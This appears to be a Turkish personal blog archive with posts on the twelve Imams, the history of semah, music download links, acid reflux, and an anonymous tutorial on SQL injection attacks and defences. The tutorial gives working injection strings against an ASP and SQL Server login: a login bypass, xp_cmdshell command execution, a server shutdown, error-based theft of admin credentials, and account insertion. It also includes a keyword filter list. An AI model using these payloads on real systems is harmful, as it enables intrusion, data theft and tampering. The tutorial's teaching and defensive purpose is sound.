Gelin Canlar Bir Olalım

12 İmamların İsimleri

2009-02-05T21:07:00.005+02:00

1.Hz. Ali

2.Hz. Hasan

3.Hz. Hüseyin

4.Hz. Zeynel Abidin

5.Hz. Muhammed Bakır

6.Hz. Cafer'i Sadık

7.Hz. Musa Kazım

8.Hz. Ali Rıza

9.Hz. Muhammed Taki

10.Hz. Ali Naki

11.Hz. Hasan Askeri

12.Hz.Muhammed Mehdi

Semahın Tarihi Kökeni

2008-01-26T22:38:00.000+02:00

Semahın Tarihi Kökeni

Alevilik ve Bektaşilik’teki semah ile Mevlevilerde gördüğümüz sema ayinleri Antikçağ’dan çıkıp gelen dinsel tören ve şölenlerin bir devamıdır. En eski dans figürlerine Çatalhöyük’te rastlandı. 1956 yılında James Mellaart’ın keşfettiği bu site Neolitik çağa ait bilgileri bizlere ulaştırdı.Çatalhöyük İ.Ö. 6500 ile 5000Yıllarına tarihleniyor. İşte bu yerleşim merkezinde ele geçen frekslerin birisinde kimi figürlerin dans eden biçimde olması dikkati çekti. Meallaart bu dansların av öncesi –avın bereketli sonuçlanması için-yapılan dinsel törenlerde yapıldığını söyler.

V.D. Hably de Antikçağ’la ilgili yaptığı araştırmalarda toplumsal ve büyüsel ritüeller içinde yer alan saz-söz ve oyundan oluşan bu gösterilerin sergilenmesindeki amaçları şöyle özetler: “Doğumla ilgili olanlar,genç erkek ve kızları eriştirme törenleri,evlenme,gizli inanç törenleri,savaş ve kahramanlık yüreklendirmeleri,dinsel erekler içinde Tanrı’ya,Güneş’e,Ay’a,ateşe,atalara iyi ve bol avlanmaya,şeytani,kötü ruhları ve cinleri kovmaya, cenazeleri defnetmeye yönelik gösteriler yumağı...”

Kalkolitik çağa indiğimiz zaman bu dinsel ve yaşamsal faktörlerle ilgili törenlere ait bilgileri Gudea döneminde yapılan Zagmuk törenlerinde buluyoruz. Zagmuk da Newroz gibi “Yeni Gün” anlamına geliyor ve gece ile gündüzün eşit olduğu 21 Mart’ta kutlanıyordu. Baharın başlangıcı,bolluk ile yeni yıla başlama törenleriydi yapılanlar... Danimarkalı Antikçağ tarihçisi Arthur Chirstensen’in kitabelerden ve yazılı kil tabletlerden çıkardığı sonuçlara göre bu bayramın tarihi günümüzden 4334 yıl kadar öncesine gitmekte. Bu bayramda ülkenin kralı, marduk heykelinin elini tutar. Böylece hem baş tanrıya hem de ona bağlı tanrılara saygısını bağlılığını kanıtlamış olurdu. Bu törende baş Tanrı Marduk tüm diğer tanrılara kral ve tabasına yardım etmeleri için gerekli emri verirdi. Tapınakta ve çevrede ateşler yakılır müzik eşliğinde oyunlar oynanır,şiirler okunurdu. Yine Antikçağ tarihçilerinden C.Brockelman’da baş tanrının karşısında diğer tanrıların baş eğip selam durmalarının, el bağlamalarının Yezidi Kürtler’de Melek-Tavus’a saygı olarak aynen korunduğunu açıklar. Arthur Christensen de aynı düşüncededir. İcra edilen müzikli oyunun Yezidlerde Sersal olarak adlandırılan yeni yılda uygulanış ve sergileniş biçiminin günümüzden 4334 yıl önceki törenlere tıpa tıp uyduğunu açıklarlar. Fransızca olan metinde benzerliğin ötesinde tıpa tıp aynısı olduğu şöyle ifade edilmiştir:”Chez Les Yezidis ce n’est pas seulement la sig nification mytholojique de la fete de I’anqui,est la même que celle du ZAGMUK Babylonien” anlamı şu: Yezidlerdeki yeni yıl bayramı Zagmuk bayramının mitolojik bir uzantısı olmayıp tıpa tıp aynısıdır.

Bu yazarlar Yezidlikte olduğu gibi Zerdüşt inancında da diğer tanrıların Ahura Mazda başkanlığında Newroz günü toplandıklarını açıklamaktadırlar. Vendidat’ın 2 numaralı bölümünü bu savları için kaynakça gösterirler. Yima’da bu törende hazırdır ve geleneğe göre gece ve gündüzün eşit olduğu bir bahar günü Newroz’u “gerçekleştirir” sunar.

Ancak aynı yazarlar Avesta’da bu törenin yeni yıl bayramı olarak bu isim altında sözünün edilmiş olmasını “yaratıldığı günden beri yılın ilk gününü belirlemenin büyük krallara ait olmasından kaynaklandığını öne sürerek açıklamaya çalışırlar.

Semah’ın tarihi kökenini araştırırken Hititler dönemine de eğilmek istiyorum. Boğazköy’de ele geçen bol miktardaki kil tabletlerin çözümü konumuza ışık tutacak ve aydınlatacak niteliktedir.

Biz semahı incelerken mabetlerde yapılan dinsel şölenlerin sunuluş biçimini, içeriğini, uygulanan kuralları ele alacağız. Böylece günümüze Antikçağ’dan çıkıp gelen benzerlikler zaten kendiliğinden ortaya çıkacak. Şölen ve bu şölende yapılan dans,oyun,gösteriler bunları yönetenler,şölenlerin hangi nedenle ve kimler için yapıldığı,beklenenin ne olduğu öğrenildiğinde günümüzdeki semah ve sema’nın da kökenine inmiş olacağız.

Şimdi inceleyeceğimiz Hitit Panteonuna ait dinsel törenlerin tümünün Hurri uygarlığından bu halka intikal ettiği artık kesinleşti. R.North,Robert Statlender, Doçent Dr. Ali M. Dinçol yazdıkları eserlerde bu gerçeğe değinmemişlerdir. Bize göre de Gudea döneminden aşağıya inerken İ.Ö. 2 binli yıllarda Zağros yöresinde atalarından gelen uygarlığı kendi ardılları olan Mitanniler ve Urartular aracılığıyla binli yıllara taşıtan bu halk,mabet töreleri,dans,oyun ve mitoslar açısından çok zengin bir perspektif sunmuştur. Bu şölen gelenekleri Medlere kadar uzanır gider. Hititler döneminde mabette kutlanan Kapı Yapısı Bayramı,Yenı yıl bayramı, Hışuva bayramı önemli olanlardandır. Bunların yanı sıra orak bayramı,bağbozumu bayramı,harman bayramı gibi tarımla ilgili olanlarda sayılabilir. Bayramların bir çoğu Kral yada yakını olanlardan birisinin başkanlığında kutlanır. Tapınak yönetmenliklerinde temizlikle ilgili konulara çok önem verilmiştir. Kadınlarla cinsel ilişkide bulunmak tinsel açıdan kirlenmeye yol açar. Görevliler buna çok dikkat etmek zorundadır. Kişi yada kişiler güneş doğar doğmaz yıkanmalı ve sabahleyin tanrıların kahvaltılarında hazır olmalıdırlar. Kim bir kadınla yatarsa ve amirleri onu sorguya çektiklerinde doğruyu söylemek zorundadır. O na söyleyemezse bir arkadaşına söyleyecek ve kesin olarak yıkanacaktır. Fakat kasıtlı olarak yıkanmaz ve kirli bir durumda Tanrı ya ve O na sunulan kurban ekmeklerine,içki kaplarına yaklaşırsa bunu gören arkadaşı da durumu gizleyip de olay sonradan öğrenilirse her ikiside idam edilir.

Hurrilerden Hittitlere geçen bu kural Gudea zamanındaki Zagmuk törenlerini tıpatıp uyguladığını açıkladığımız Yezidi Kürtlerde de bu temizlik koşulu ile karşılaşırız.

“Sersal ( Yeni Yılı ) kutlamak için Şeyh Addi nin türbesinde toplanan yezidi cemaati adak etini (Kabduş) yemeden önce türbenin altından geçen Zemzem suyunda yıkanırlar.”

Tarihci A.H.Layard da Kürdistan da yaptığı bir inceleme gezisinde temizlik konusunda şu izlenimini dile getirir:

“Yezidi kasabasının varoşlarında kadınları ana dere içinde yıkanırlarken gördüm. Ertesi gün yapılacak törene hazırlanıyorlardı. Çünkü hiç kimse Şeyh Addi Türbesine bedenini ve elbiselerini temizlemeden giremez. Beni görmedikleri için tamamen soyunmuş olmalarına rağmen çekincesiz gezinmekteydiler. Erkekler ise gündüz derenin bir başka yerinde yıkanmışlardı”

Zerdüştlerde de düzenlen tören ve dinsel şölenlerde görevliler ve törene katılanlar temizlenmek zorundadırlar. Zerdüştler ayrıca nefesin ateşi kirlettiklerine inandıklarından ağızlarına bez bağlarlar.

Hititler döneminde yapılacak törende kral ve kraliçe özel tören giysilerini giyerler. Özel bölümde yer alırlar.

Bugün ki deyimi ile mutrıp kurulu yani müzik aletlerini çalanlar kral ve kraliçenin önünde ve ardında fasıla başlarlar. Dansçılar ellerini yukarı kaldırır sonra oldukları yerde çark atarlar (dönerler). İlahiler okunur.

Törenin önemli bölümlerinden biriside dini yemek faslıdır. Yemek işinde dini kurallar titizlikle uygulanır. Sofrada dem alınır. Dinsel yemek görevlileri ise sofracı,süpürücü,içki sunucu ve haberciden oluşur. İlahi okuyanlar,şarkı söyleyenler,çalgıcılar ve dansçıların özel giysileri içinde geçit töreni yaparlar.

Alevilik ve Bektaşilikte semah yapanların özel giysi giymeleri zorunluluğu yoktur.

Cem ve Sema törenlerinde de tanrının yakını olan kralın yerini dede ve postnişin almıştır. Dinsel tören yemeği bu felsefelerde de vardı. Semah ve Sema dan sonra yenen yemeğe Mevlevilikte Sumak. Alevilikte Sımat adı verilir. Yezidiler ise “kabduş” demektedirler. Aynı gelenek Zerdüştilerde de karşımıza çıkar.

Aşure geleneği de dinsel yemek törenlerinin bir uzantısıdır.

Biz yazımızda Semahın da içinde yer aldığı bir ritüeli temellerine inerek –Semahın da bir parçasını oluşturduğu – bu şölenin eskiliğine işaret etmiş olduk.

Şimdide semahın içeriği, amacı, biçimi üzerinde durmak istiyoruz.

Büyük zaman ve dıştan gelen etkiler sonucu değişmelerede uğramıştır.

Nitekim islamiyetin anadoluda yayılması ve bu dinin aldığı sert önlemler yüzünden semah – islamiyette çalgı,çengi, dem ve dans yasak olmasına karşın – islami bir şalı üzerine çekmek zorunda kalmış ve böylece varlığını koruyabilmiştir. Zerdüştlüğün,Yezidiliğin ve Sabiiliğin yarattığı tasavvuf (BİR OLMA yani birsellik) düşüncesi halk müslümanlığı ile bütünleştirilerek devlet müslümanlığına karşı çıkılmış;bu yüzden de pek çok alevi canlarının kanları akıtılmışsa da sonuçta bu günlere gelinebilmiştir. Eğer alevilik direnci olmasaydı biz ülkede,yöneticilerin kendilerini tanrının gölgesi sayma ve bu yolda bağnaz gerici uygulamaları ile özgür düşünceyi tümü ile ortadan kaldırmış olacaklarını düşünmekteyiz.

Semah sanıldığı gibi oyun olmadığını önceki yazılarımızda anlatmıştık. Hünkar Hacı Bektaşa göre;

SEMAH ARİFLERİN ALETİ
MUHİPLERİN İBADETİ
TALİPLERİN MAKSUDUDUR
İLAHİ BİR SIRDIR
O KİMSE Kİ SEMAHI BİR OYUN SANIR
O CİFE DİR.

Mevlana da bir rubaisinde sema için şunları söyler;

YÜCESİN NUR GİBİSİN BİLKİ BÜTÜN SIR SENDE
BİR EKİN AŞKIN İLE GİT GİDE YÜZ OLMADAYIM
SEN SEN OLDUKÇA SEMA ETMEKTEYİM ÇEVRENDE
BEN SEN OLDUKÇADA ÇEVREMDE DÖNÜP DURMADAYIM

Bu iki bilginin de ortak görüşü semahın Tanrı ile bütünleşme,O nun zerresi haline gelme yani vahdaniyetin özü olduğu noktasında odaklaşıyor. Semah,bir coşku ve cezbe aracıdır. Müzik ve raks aracılığı ile kişi manevi bir alemde geziye çıkmaktadır.

Ünlü İpek Yolu filmini çeken rejisör Omara nın da bir japon olarak sema törenini Konya da izledikten sonra bize anlattıkları bundan hiç farklı değildi.

Semah ve Sema yalnız bu özelliği ile değil, şiirin,müziğin ve raksın,yaşaması gelişmesi ve boyutlanmasında da büyük yarar sağlamıştır.

Gelin Canlar Bir Olalım

2008-01-09T12:33:00.000+02:00

GELİN CANLAR BİR OLALIM

2007-07-06T09:21:00.000+02:00

BİZİMLE ÇALIŞMAK İSTER MİSİNİZ?

nil karaibrahimgil - bu mudur ? - mp3

2007-05-01T12:17:00.000+02:00

indir

nil karaibrahimgil den bumudur mp3, hemen indir...

göksel yarabbi şükür...

2007-04-21T12:27:00.000+02:00

goksel-yarabbi_sukur_ynlzbn_.MP3

göksel yarabbi şükür - mp3 hemen indir

para üstünde sizin resminiz olsun

2007-04-17T12:56:00.000+02:00

http://www.festisite.com/tools/generators/money/

SQL Enjeksiyon Saldırıları & Korunma Yolları

2007-04-14T11:07:00.000+02:00

Dünyanın her tarafında, kullanıcılarına; kredi kartı numaraları, kullanıcı bilgileri gibi gizli kalması gereken bilgilerin, ürünlere ve siparişlere ait verilerin saklandığı uç-arka veri depolarıyla hizmet veren web siteleri bulunmaktadır. Ve genel olarak, web sitelerindeki form aracılığı ile alınan girdi ile veritabanındaki bilgiler filtrelendikten sonra sonucu kullanıcıya gönderen bu tür sistemlerde Yapısal Sorgulama Dili (Structured Query Language - SQL) kullanılmaktadır. Uygulama içerisinde kullanılacak parametre değerleri alınırken kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle güvenlik problemleri ortaya çıkmaktadır.

Bu güvenlik problemleri kullanılarak bir uygulamanın arkasında, bu uygulamaya destek veren veri tabanı üzerindeki bütün bilgilere ulaşılabilir veya bilgiler üzerinde değişiklik yapılabilir. Veya veri tabanı sisteminin komutları kullanılarak kullanılan sunucular üzerinde uygulama harici istenen işlemler de yapılabilir. Bu problemlerden korunmak için de uygulama girdilerini bu tür karakterlere karşı kontrol eden fonksiyonların kullanılmalı ve geniş çaplı uygulamaların bu güvenlik açıklarını taşıyıp taşımadığını anlamak için güvenlik denetimine tabi tutulmalıdır..

İlgilendiren Sektör ve Şirketler:

* Özel olarak geliştirilmiş uygulamalar kullanan tüm kurum ve kuruluşlar
* Internet / Intranet üzerinde uygulama geliştiren kuruluşlar

1. Bir Uygulama Güvenliği Problemi - "Yapısal Sorgulama Dili Kullanımı"

Yapısal Sorgulama Dili SQL'in uygulamalarda kullanımına örnek vermek gerekirse;

SELECT Name, Address FROM Users WHERE UserID = '1111'

Şeklindeki SQL Deyimi "Users" adlı tablodan "1111" ürün ID si ile veritabanına kayıtlı olan kişiye ait olan isim ve adres bilgilerini dönecektir. Bu noktada muhtemel zayıflık, kullanılan formun SQL Deyimini yeniden yapılandırabilecek bazı özel karakterlere izin vermesiyle ortaya çıkmaktadır. Çözümü ise girdilerden bu özel karakterlerin filtrelenmesini sağlayan fonksiyonlardır.

Hızla gelişen internet teknolojileri karşısında yeni pazarda geç olmadan yerini almak isteyen müşterilerine daha kısa sürede daha kullanışlı ve ucuz çözümler sunmak zorunda olan uygulama geliştiriciler bu süreçte güvenlik gibi önemli bir faktörü ikinci plana atmaktadırlar.

Giderek yaygınlaşan ve medyanın haber potansiyelini oluşturan; çalınan kredi kartı numaraları, yer altı sitelerde dağıtılan müşteri bilgileri, şirket projeleri - yazışmaları yaklaşan tehlikenin habercisi olmakla beraber halen bu tür kayıpların yaratabileceği maddi sonuçları kavrayamayan ve hala "az maliyetle kurtarılan güvenlik projeleri" 'yle övünen yöneticilere uyarı niteliği taşımaktadır. Öyleki -herzaman bir adım önde olmayı amaçlayan- saldırganlar güvenliğin en üst seviyede olması beklenen devlet siteleri de dahil olmak üzere pek çok sisteme yönelik saldırılarına da ara vermeksizin devam etmektedirler.

Maddi ve manevi değere sahip şirketinizi bir anlamda iş ortaklarını olan uygulama geliştiricilerin hazırladıkları uygulama ürünlerine emanet edildiğini düşünürsek, "uygulamalarınıza ne kadar güvenirsiniz?" gibi bir soruya verilecek cevap büyük önem taşımaktadır.

Böyle bir ortamda uygun güvenlik çözümü için ayrılmış bütçe bir lüks değil her an yapılabilecek bir saldırıda şirketin uğrayacağı zararı ortadan kaldırmak için alınması gereken önlem niteliği taşımaktadır.

2. Örnek Saldırılar - "Yapılacak Hamleleri Önceden Tahmin Edebilmek..."

Güvenlikte sıkça kullanılan bir deyim; "Saldırganlardan korunabilmek için onlar gibi düşünmelisiniz!..". Saldırganın sisteminize girmek için kullanabileceği yöntemleri bilmek bu saldırılardan korunabilmek için alınan önlemleri daha sağlıklı kılacaktır.

Örneklerde kullanacağımız hedef ; Microsoft® Internet Information Server™' dan Microsoft® SQL Server™'a varsayılan sistem hesabı'ndan (sa) bağlanan ASP tabanlı bir kullanıcı hesabı yöneticisi olacak.
Form.asp : Username ve Password girdisini alan form.Solda...
Login.asp : Veritabanı ile bağlantıya geçen ve girdinin doğruluğunu kontrol eden ASP kodu.

2.1. Kötü Amaçlı (') İmleçleri Yardımıyla İzinsiz Giriş Sağlama:

Kullanıcı "Username" & "Password" verisini Login.asp ye yolladıktan sonra .asp kodunun yapacağı iş verilen yoldaki veritabanı ile bağlantı kurup ilgili tabloda Username ve Password sütünlarında gönderilen verinin doğruluğunu kontrol etmek olacaktır. Bu işlem sonucunda eğer sonuç olumluysa kullanıcıya; "Giriş Yapıldı" olumsuzsa; "Geçersiz Kullanıcıadı & Şifre" mesajı verilecektir.

Örnekleyecek olursak;

Username : xxxx
Password : 1111

Şeklindeki kullanıcı girdisi aşağıdaki SQL Deyimini oluşturacaktır;

SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = '1111'

İlk bakışta sorun olmayan bir SQL Deyimi... Fakat saldırganın;

Username : xxxx
Password : ' OR 1=1--

Şeklindeki girdilerle oluşturacağı SQL Deyimi ise;

SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = '' OR 1=1 --'

Olacaktır ki, bu durumda girişin sağlanması için şart "xxxx" kullanıcı adına ait şifrenin hiçbirşey* olması veya ikinci bir opsiyon olarak 1=1 eşitliğinin sağlanmasıdır.

* Hiçbişey = Boşluk

Sonuç : 1=1 eşitliği sağlandığına göre saldırı başarıyla sonuçlanacak ve "Giriş Yapıldı" mesajı verilecektir.

Not : Microsoft® SQL Server™ "--" imlecinden sonra gelen yersiz kullanılmış tırnak işaretlerini göz ardı edecektir. İlk bakışta basit gibi görünen ve sadece SQL Server'a ait olan bu özellik ilerde örneklerden de anlaşılacağı üzere saldırgana büyük kolaylık sağlayacaktır..

2.2. Uzaktan Çalıştırılması Mümkün Olan Prosedürler:

MS SQL Server'a varsayılan sistem hesabından yaptığımız bağlantı SQL Enjeksiyon saldırısında muhtemel saldırgana sunucuda saklanan prosedürleri çalıştırabilmesi için gerekli hakları tanıyacaktır. Saldırganın kullanabileceği prosedürlerden bir tanesi; "master..xp_cmdshell" olabilir.

Username : xxxx
Password : '; EXEC master..xp_cmdshell 'dir c:'--

Girdileriyle oluşacak SQL Deyimi;

SELECT count(*) FROM Users WHERE Username = 'xxxx' AND Password = ''; EXEC master..xp_cmdshell 'dir c:'--'

Sonuç : SQL Server Kullanıcıadı ve Şifreyi bulunduran sütunları arayacaktır bulamadığı için "Yanlış Kullanıcıadı & Şifre" mesajını verecektir fakat bu arada arka planda "dir c:" komutunu çalıştıracak ve saldırgan C sürücüsünün içeriğine ulaşacaktır.

2.3. SQL Server Hedef Alınarak Yapılan Saldırılar:

Yönetici haklarına sahip saldırgan silme,ekleme,değiştirme...vb gibi komutları rahatlıkla çalıştırabilecektir.

SHUTDOWN WITH NOWAIT SQL Server'ın kritik komutlarından bir tanesidir. Komutla beraber SQL Server görevine son verir.

Username : '; SHUTDOWN WITH NOWAIT--
Password : [Boş]

Bu girdilerle oluşturulan SQL Deyimi;

SELECT Username FROM Users WHERE Username=''; SHUTDOWN WITH NOWAIT; --' AND Password=''

Sonuç : SQL Server kullanıcıadının bulunamadığı mesajını verecektir. Fakat bununla beraber arka planda diğer komutu çalıştırdığı için SQL Server kapanacaktır.

2.4. ODBC Hatalarından Faydalanarak Yapılan Saldırılar:

SQL Server'ın verdiği hatalardan faydalanarak veritabanındaki neredeyse tüm bilgilere ulaşmak mümkündür.

Hedef; http://Victim/Default.asp?id=10 şeklinde ürün ID leri ile çalışan ASP tabanlı bir websitesi.

Saldırı SQL Server'ın integer ve string cinsinden verileri birlikte gönderememesinden faydalınarak yapılabilir;

Gönderilen '10' sayısına veritabanından herhangi bir string eklenir.

http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Not: "INFORMATION_SCHEMA.TABLES" sistem tablosu, sistemde bulunan diğer tüm tablolar hakkında bilgi içerir. Deyimde kullanılan "TABLE_NAME" de
yine tüm tablo isimlerini içerir.

Oluşacak SQL Deyimi;

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

String -> Integer dönüşümünü yapamayan SQL Server aşağıdaki hatayı verecektir.

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Table1' to a column of data type int.
/Default.asp, line 5

Hata, saldırgana "Table1" olarak bulduğu cevabı integer a çeviremediğini (dolayısıyla veritabanındaki ilk tablo adının "Table1" olduğunu) belirtmektedir.
Saldırgan diğer tabloların adını aşağıdaki şekilde öğrenebilir...

http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('Table1')--

Veya doğrudan LIKE komutunu kullanarak aradığı şeye daha kolay yoldan ulaşabilir;

http://Victim/Default.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25Login%25'--

SQL Server'ın vereceği hata;

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin_Login' to a column of data type int.
/Default.asp, line 5

Admin_Login adında bir tablo olduğunu öğrenen saldırgan muhtemelen tablodaki ilk kullanıcıadı ve şifreye ulaşmak isteyecektir. İzleyebileceği yol ise;

http://Victim/Default.asp?id=10 UNION SELECT TOP 1 Username FROM Admin_Login--

Hata;

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'xxxx' to a column of data type int.
/Default.asp, line 5

Bu şekilde "admin" kullanıcıadının varlığını doğrulayan saldırganın şifreyi ele geçirmek için kullanacağı girdi;

http://Victim/Default.asp?id=10 UNION SELECT TOP 1 Password FROM Admin_Login WHERE Username='xxxx'--

Hata;

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '1111' to a column of data type int.
/Default.asp, line 5

Sonuç :
Username : xxxx
Password : 1111

2.5. Veritabanına Ekleme Yapma veya Veri Düzenleme:
Kullanıcıadı ve şifre bilgisine ulaşan muhtemel saldırgan benzer yöntemleri ve UPDATE,INSERT komutlarını kullanarak şifreyi değiştirebilir veya daha temizi başka bir kullanıcı hesabı açabilir...

http://Victim/Default.asp?id=10; UPDATE 'Admin_Login' SET 'Password' = 'NewPwd' WHERE Username='xxxx'--

Yeni bir kullanıcı hesabı için;

http://Victim/Default.asp?id=10; INSERT INTO 'Admin_Login' ('UserID', 'Username', 'Password', 'Details') VALUES (666,'aaaaa','1111','N/A')--

3. Nasıl Korunmalı? - "Aksi Doğrulanıncaya Kadar Tüm Kullanıcı Girdileri Kötüdür..."

Gelebilecek SQL Enjeksiyon saldırılarından korunabilmek için alınan önlemlerde temel alınması geren nokta... "Aksi doğrulanıncaya kadar tüm kullanıcı girdileri kötüdür!".

3.1. Kullanıcı Haklarının Sınırlandırılması

Yaygın olarak yapılan hata; Web Server dan SQL Server a yapılan bağlantılarda varsayılan sistem hesabı kullanılması... Bu şekilde yönetici haklarına sahip olan saldırgan örneklerde de görülebileceği üzere isteği komutu çalıştırıp istediği ekleme,silme,düzeltme eylemini gerçekleştirebilecektir. Bunu yerine yapılması gereken yeni bir kullanıcı hesabı oluşturup kullanıcının çalıştırabileceği komutları sınırlandırmak olacaktır.

Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasından sipariş verilmesine izin verecekseniz, "web_user" gibi bir kullanıcı adı oluşturup ürünleri incelemek için; ürünler sütununda sadece "SELECT" kullanımına ve siparişleri için; siparişler sütununda sadece "INSERT" kullanımına izin vermeniz uygun olacaktır.

3.2. Girdilerde Tırnak İmleçlerinin (') Kötü Amaçlı Kullanımının Engellenmesi

Yaygın SQL Enjeksiyon saldırıları SQL deyimlerinin girdilerdeki gereksiz (') tırnak işaretleri yardımıyla yeniden oluşturulması sayesinde yapılır.

Küçük bir filtreleme fonksiyonu veya tek tırnağı çift tırnağa çeviren bir fonksiyon muhtemel bir saldırıyı engellmek için yeterli olabilir.

ASP Kullanarak girdileri kontrol ederek değiştiren bir fonksiyon kolaylıkla yazılabilir;

<%
Function ReplaceQuotes(strWords)
ReplaceQuotes = Replace(strWords,”’”,”””;)
End Function
%>

Bu fonksiyonu baştaki örnekte kullanırsak;

SELECT count(*) FROM Users WHERE Username='xxxx' AND Password='' OR 1=1 --'

şeklinde olan deyim...

SELECT count(*) FROM Users WHERE Username='xxxx' AND Password='" OR 1=1 --'

'e dönüşecektir.

3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi

SQL Enjeksiyon saldırıları genelde ";, --,SELECT, INSERT ve xp_" gibi karakterlerin-kelimelerin kullanılmasıyla yapıldığı için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayıflığı engelleyebilir.Örneğin kullanıcıdan E - Mail adresini girmesi isteniyorsa harfler ve sayıların yanında sadece " @,-,_,." karakterlerinin kullanılmasına izin verilmelidir.

Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanlı DLL ler, kullanıcı taraflı fonksiyonlar...vb, izole edilmiş bir sunucuya taşınmalıdır. Bazı zararlı kelime-harfleri filteleyen ASP fonksiyonu aşağıda örneklenmiştir;

<%
Function FilterBadWords(strWords)
dim BadWords
dim NewWords
BadWords = array("SELECT", "DROP", ";", "--", "INSERT", "DELETE", "xp_";)
NewWords = strWords
for i = 0 to uBound(BadWords)
NewWords = Replace(NewWords, BadWords(i), "";)
Next
FilterBadWords = NewWords
End Function
%>

Tırnak değiştirme fonksiyonu ve filtreleme fonksiyonu beraber kullanılırsa;

SELECT Username FROM Users WHERE Usename=''; EXEC master..xp_cmdshell 'dir c'; --' AND Password=''

Şeklindeki SQL Deyimi...

SELECT Username FROM Users WHERE Usename='" EXEC master.. cmdshell "dir c:" ' AND Password=''

e dönüşecektir ki bu da herhangi bir kayıt bulumadığı hatasını vermekten öteye gitmeyecektir.

Bu fonksiyonu kullanıcıdan gelen bütün girdilere, adres satırı ifadelerine ve çerezlerden gelen tüm veriye uygulamamız gelebilecek saldırının önüne geçecektir.

3.4. Girdi Uzunluğunun Sınırlandırılması

Veritabanındaki ayrılan alanın uzunluğu 10 karakterlikse, formunuzda bu alan için 50 karakter sığan bir text kutusuna sahip olmanız sakıncalı olabilir. Ve mümkün olduğu kadar girdi uzunluklarını kısa tutmak muhtemel saldırıyı engellemek için önlem sayılabilir.

3.5. Girdi Cinsinin Kontrol Edilmesi

Formunuzdan girilen verinin istediğiniz türden bir veri olup olmadığını kontrol eden bir fonksiyon kötü amaçlı kullanımlarda saldırganın kullanabileceği harf/sayı seçeneğini kısıtlayacaktır. Mesela, eğer Ürün ID si için formunuzdan girdi alıyorsanız girdinin sayısal bir ifade olup olmadığını kontrol eden bir fonksiyon fayda sağlayacaktır.

3.6. Girdi Cinsinin Kontrol Edilmesi

Formunuz aracılığı ile topladığınız verileri yollarken mutlaka "POST" metodunu kullanın ki kullanıcılarınız adres çubuğunda girdikleri verilerle beraber form değerlerini gördüklerinde akıllarına farklı fikirler gelmesin.

4. Son Söz - "Herzaman bir adım önde!"

Aldığınız güvenlik önlemleri veya (en iyi ihtimalle) yazıp da kullanmayı bir alışkanlık haline getiremediğiniz güvenlik politikaları sizi güvenlik problemlerine karşı koruyabilir mi? Eğer güvenlik ile ilgili problemleri yönetmeyi süreç temelli bir güvenlik bilinci içerisinde ele almıyorsanız hiçbir güvenlik ürünü, bir güvenlik kaybına uğramanızı engelleyemez.

Bilgi sistemleri altyapınızı taşıdıkları güvenlik zaaflarına karşı düzenli olarak kontrol ettirmek, risklerinizi takip etmek, doğru teknolojiyi doğru yerde ve doğru şekilde kullanmanızı sağlayacak güvenlik politikalarınızı oluşturup güvenlik probleminizi sürekli yönetebilecek olgunluğa ulaşmak hedeflenmelidir. Bilgi sistemlerinin önemli bir kısmını oluşturan uygulamaların taşıyabileceği güvenlik sorunları uzun süredir ihmal edilmelerinden dolayı, günümüzün en popüler sistem sızma noktalarını teşkil etmektedirler. Bu nedenle uygulama güvenliğine ilişkin gereken önemi vermeniz, güvenlik denetimi yaptırmanız ve kurumunuzun bilgi güvenliği yönetim sistemini oluşturmaya bir yerinden başlamanızı öneriyoruz.

Yazan: Yazarın isteği üzerine ismi kaldırıldı.(Anonim)

çekim hataları

2007-04-13T13:58:00.000+02:00

Davs - örnek

2007-04-11T14:47:00.000+02:00

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

Reflü hakkında

2007-04-11T11:22:00.000+02:00

Kısaca Reflü olarak anılan Gastro Özofageal Reflü (GÖR), mide içeriğinin yemek borusuna geri kaçmasıdır. Reflü hastalığı ise çeşitli sebeplerden dolayı mide içeriğinin yemek borusuna doğru geri kaçması sonucunda ortaya çıkan bir dizi şikâyetlerdir. Bu kaçak belli bir sürenin ve miktarın üstünde olunca ciddi problemlere yol açar ve bu önemli bir sağlık sorunudur.
Reflü toplumumuzda erişkinlerin yaklaşık yüzde 20'sinde görülmektedir.

Yemek borusunun alt ucunda mide içeriğinin yemek borusuna geçişini engelleyen bir kapak mekanizması vardır. Reflü hastalarında en sık görülen özellik bu mekanizmanın gevşekliğidir. Bu durum sıklıkla mide fıtığıyla birlikte yaşanır. Mide boşalım bozukluğu ya da bozulmuş yemek borusu hareketi bu hastalığı tetikleyen nedenlerdir.

Reflü Hastalığının genel şikayetleri şöyledir:

* Mide yanması (en sık),
* Göğüste yanma ve ekşime,
* Ağza gelen acı tat,
* Ağız kokusu,
* Tok karna yatıldığında şişkinlik, geğirme ve boğulma hissi,
* Göğüste takılma ve sıkışma hissi,
* Göğüs kafesine bası ve çarpıntı,
* Nefes almada güçlük,

Daha ileri evrelerde

* Kronik Farenjit
* Kronik Sinüzit,
* Alerjik Astım Ve Diş Çürükleri

